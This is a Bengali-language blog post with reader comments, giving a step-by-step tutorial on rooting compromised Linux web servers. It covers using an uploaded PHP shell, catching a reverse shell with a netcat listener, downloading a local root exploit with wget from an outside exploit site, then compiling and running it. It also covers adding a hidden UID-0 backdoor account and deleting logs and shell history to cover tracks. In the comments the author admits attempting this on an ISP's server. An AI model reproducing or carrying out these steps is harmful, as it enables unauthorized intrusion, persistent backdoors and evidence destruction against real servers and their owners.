আজকে বলতে গেলে কঠিন একটা বিষয় নিয়েই লিখছি । যারা একদম প্রথম পড়ছেন তারা কিছু বুঝবেন না । যারা সিকিউরিটি নিয়ে অনেকদিন ধরেই পড়ে আছেন তাদের কাছে এটি মজার বিষয়। আচ্ছা কথা না বাড়িয়ে চলুন শুরু করি ।
.................................................................10%3∞ .........................................................
সার্ভার রুটিং কি ?
রুট হল সব সার্ভার এর administrator । কেউ যদি রুট অ্যাক্সেস পেয়ে যায় তাহলে সে পুরো সার্ভার কে নিয়ন্ত্রন করতে পারবে। যেমন ধরুন ম্যাস ডিফেস কিংবা ক্রাশ করতে পারবে। অনেক হ্যাকিং গ্রুপ এ পন্থা অবলম্বন করে । সার্ভার রুটিং এর অনেকগুলো ভাগ আছে । আপনি যদি একদম এ নিয়ে শুরু করতে চান তাহলে আপনার উইন্ডোজ পিসি দিয়ে শুরু করাই ভাল হবে ।
একটি সার্ভারে ROOT করার তিনটি উপায় আছে
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
আমি আপনাদেরকে দেখাব উইন্ডোজ পিসি থেকে কিভাবে লিনাক্স এ রুট করতে হয় । আপনি এ ধরনের ইংরেজি অনেক টিউটোরিয়াল পাবেন কিন্তু আপনার নিজের ভাষা তেই আপনি সবথেকে ভাল বুঝবেন ।
কাজের ধারা >>>>
যা যা লাগবে
> SHELLED SITE
> A LOCAL ROOT EXPLOIT
> NETCAT
Step 1 - Gathering informations
প্রথমে আপনার পিএইচপি শেল ওপেন করুন । আমি যেমন আমারটা করেছি ।
এখন আপনাকে জানতে হবে আপনার ভিক্টিম কি Kernel ব্যাবহার করে । এটি নিচের মত হতে পারে ।
Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686
এখন আপনাকে কোন লোকাল রুট খুজে বের করতে হবে । যেমন আমার টা ছিল
2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686.
এসব খোজার জন্য আপনি exploit-db, 1337day, th3-0utl4ws এসব সাইট ব্যাবহার করতে পারেন বা গুগল এ খুজলে হাজার হাজার পাওয়া যাবে ।
Step 2 - Backconnecting to the server
এর জন্য আপনার লাগবে
NetCat
Open port (Example. 443আমি আপনাকে পোর্ট ফরওয়ার্ডিং সেখাচ্ছি না ...... গুগল এ খুজলেই পেয়ে যাবেন !!)
আপনার netcat খুলে টাইপ করুন :
-l -n -v -p 443
Hit "Enter"
এই কাজ কিন্তু cmd তে করতে হবে
তাহলে এটি রিপ্লাই দেবে এরকম "listening on [any] 443 ..."
এবার আপনার শেল এ ফিরে যান । এরপর সেখানে আপনি "BackConnect function" পাবেন । এবার আপনার কাঙ্খিত পোর্ট নাম্বার লিখুন । আমি 443 ব্যাবহার করেছি । এরপর কানেক্ট করুন
এটি আপনার netcat কে কানেক্ট করবে। আমি নিচের ছবির মতই কিছু পেয়েছি ।
Step 3 - Downloading exploit and executing it
এখন আমাদের প্রথম ধাপের উপকরন লাগবে । শেল আপ্লোড করার দুটি পন্থা আছে
1) Using shell uploader
2) Using 'wget' function (Requires backconnection)
আমি দুই নম্বরটা কে সহজ মনে করি । এরপর আপনার রুত এর লিঙ্ক টি কপি করুন । আমার টা ছিল এরকম
http://localroot.th3-0utl4ws.com/xploits...8-164.zip
এখন আপনার নেটকাটে ফিরে যান এবং লিঙ্ক টাইপ করুন । তাহলে এটি সার্ভারে "2.6.18-164.zip" নামে ফাইল ডাউনলোড করল ।
আপনার exploit টি যদি anyrandomname.c নামে ডাউনলোড হয় তাহলে আপনাকে এটি কম্পাইল করতে হবে ।
প্রথমে ডাউনলোড করুন এবং টাইপ করুন
gcc anyrandomname.c -o anyrandomname
তাহলে এটি কম্পাইল হয়ে যাবে ।
chmod 777 yourexploit'sname
আমি যেখানে your exploit লিখলাম সেখানে আপনি নিজের টা লিখবেন
এখন সর্বোপরি exploit রান করতে হবে এটি লিখে
./yourexploit'sname
Step 4 - Adding root user
মানে আসল অ্যাডমিন ছাড়া অন্যদের এখানে এখানে অ্যাড করা যাবে এটি খুব সহজ ।
এই কম্যান্ড ব্যাবহার করুন
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
কম্যান্ড এর ব্যাখা
Quote:adduser - এটি তখন ব্যাবহার করা হয় যখন কোন নতুন অ্যাকাউন্ট ওপেন হয়
-u 0 -o - Set the value of user id to 0.
-g 0 - Set the initial group number or name to 0
-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M - 'home directory' not created for the user.
root2 - এটি আপনার ইউযারনেম .NOTE: root2 তে আপনি ইচ্ছা মত নাম দিতে পারেন
Now you need to set a password for your username.
Type in next:
passwd Root2
(Root2 is your username)
একটি উদাহরণ দেখুন
[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
আপনি ঠিকমত করেছেন কিনা এইকমান্ড দিয়ে তা পরীক্ষা করতে পারেন
id root2
(Root2 is your username)
GNY shell - http://www.4shared.com/office/jLmzLh83/GNYShell.html
NetCat - এটি সেটাপ এ অনেকের সমস্যা হতে পারে তাই সরাসরি লিঙ্ক দিলাম না এই লিঙ্ক এ যান
http://linhost.info/2011/05/netcat-for-windows/
Clearing Logs:
এখন আমাদের সব ট্র্যাক মুছতে হবে
.rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
শেষ কথা
আপনি যদি হ্যাকিং এর প্রাথমিক বিষয় গুলো না যানেন তাহলে এই দিকে যাবেন না । এটি আপনার জন্য ক্ষতিকর হতে পারে
সমস্যা হলে বলবেন । আর এখান থেকে কিছু না বুঝলে আপনি অবশ্যই ভিডিও দেখবেন
এরকম সবকিছু > http://www.facebook.com/CY133R এ
আর আমি > http://www.facebook.com/techfreak.unknown এ
আল্লাহ হাফেয
...............................................................10%3∞ ................................................
আমি রাশেদ রাহুল। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 11 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 53 টি টিউন ও 50 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
@Rizwan Bin Sulaiman: ho.. pura CEH hacker apne.. aibar nachen.. ekta tutorial porlei hacker howa jay? (-_-)
jatir kase amar proshno :v
যাহোক অনেক দিন পর আসল হ্যাকিং পদ্ধতি দেওয়ার জন্য ধন্যবাদ। Shelled site বলতে PHP shell code বুঝিয়াছেন না shell uploaded website বুঝিয়াছেন এটা বুঝতে পারছি না। আর মাঝে কিছুটা বাদ দিয়ে গিয়াছেন । একারণে যারা হ্যাকিং এর সাথে জড়িত নয় তারা হইত কিছুই বুঝতে পারছেনা। আর একটু বেশি লিখলে ভালো হতো নতুন দের জন্য। যা হোক এভাবে বোঝানও সম্ভব না।
@Rizwan Bin Sulaiman
তোমরা এখনো অনেক ছোট এগুলো বোঝার জন্য । এটা লেবু দিয়ে বাতি জালানো বা কাগজ বাঁচানোর পদ্ধতি না ।
@rashed rahul উইন্ডোজ এর থেকে লিনাক্স হ্যাকিং এর জন্য ভালো আর সহজ
http://blog.hackplanet.in/2012/05/rooting-server-learn-ethical-hacking.html
@all
দেখুন সার্ভার রুটিং অনেক পরের ব্যাপার । আপনাকে আগে sqli, rfi, xss, lfi জানতে হবে । কিভাবে শেল আপ্লোড করতে হয় তা জানতে হবে । কিছুটা বিদ্ঘুটে লাগতে পারে কিন্তু viDio টা দেখুন । না বুঝলে এরকম অনেক ভিডিও আপনারা পাবেন । কিন্তু root করার সময় কোন ভিপিএন বা প্রক্সি ব্যাবহার করবেন না ।
https://www.youtube.com/watch?v=dOpPbpUeeAo
Sensative baper nia keo tune korle chandi gorom hoe jai. Ei first apnar tune dekhe chandi gorom holo na. Osombob gusie tune korsen. valo lagse karon required person sara onna ra kisu bujbe na 😉
Sorasori priote.
ভাই… এভাবে আর কত…??? পুরা হুবহু তুইলা দিছেন। গ্রুপ এর মান সম্মান সব ডুবাইবেন। অন্য রকম কিছু পোস্ট দেন যাতে সাধারন মানুষ উপকৃত হয়, অন্যথায় পোস্ট দিয়েন না
প্রমানঃ http://secrethacker-akshay.blogspot.com/2012/03/server-rooting-tutorial-and-adding-new.html
আর নয়তো আপনার আই.ডি থেকে বাংলাদেশ সাইবার আর্মি নাম টা মুছে দিন। কারন উনাদের টিউটোরিয়াল গুলো খুব ই উচ্চ মানের এবং তাদের টিউটোরিয়াল নিয়ে কথা বলার অবকাশ ও থাকে না।
ছবিগুলো দুটো ব্লগ ঘুরে নেয়া। কিন্তু লেখা কপি পেস্ট না। ১০০% বাজি ।
আর আমি BCA তে নতুন যোগ দিয়েছি । এ লেখা এর আগে প্রকাশিত । তাই এর সাথে সম্পরকজুক্ত হতে পারেনা । আর BCA পাব্লিকালি কোন টিউটো্রিয়াল দেয় না । যেগুল দেয়া হয় বেশিরভাগ মেম্বার ৪ , ৫ টা ব্লগ ঘুরে তারপর বাংলা অনুবাদ করে খসড়া গ্রুপ এ দেন । এ ধরনের বিষয় খুবই সংবেদন শীল । আশা করি বুঝে শুনেই কথা বলবেন ।
@rashed rahul: hahaha.. edit koresen lekha??? 100% ek silo + photo soho… amar kase google cache version ase.. jodi chan seta group e post kore dibo.. kinto ami BCA ke jothesto respect kori. asha kori next e tutorial er naam e copy paste off korben.. best of luck for ur future
@ cyber 71
আসলে আমি সার্ভার রুট এর জন্য সার্ভার পাথ তৈরি করেছিলাম ……… কিন্তু আমার targeT সার্ভার ছিল একটা ইন্টারনেট isp দের সার্ভার । আমি কয়েকটি যায়গায় কিছু ভুল করেছিলাম আর track ঠিকমত মুছিনি । তাই সমস্যা হয়েছিল…… পুরো কাজ করার পর সামান্য ভুল এর কারনে সফল হইনি … কিন্তু টেকনিক এ রকম ছিল । তাই টিউন করেছি …… আমি জানি আপনার মত দক্ষ অনেকেই আছেন যাদের হ্যাকিং নিয়ে গাযা খুরি গল্প ভাল লাগে না …… আর এটি রুট এর একদম প্রাথমিক পদ্ধতি । যায় হোক আপনি আমার হ্যাকিং নিয়ে অন্য লেখা পড়বেন তাহলে বুঝবেন আমি NooB না । আপনার সাথে পরিচিত হয়ে ভাল লাগলো ।
ভাল লাগলে প্রোফাইল বা পেজ এ চলে আসবেন কথা হবে
regards…
Rashed Rahul
waw………tahole amio ki hacker ?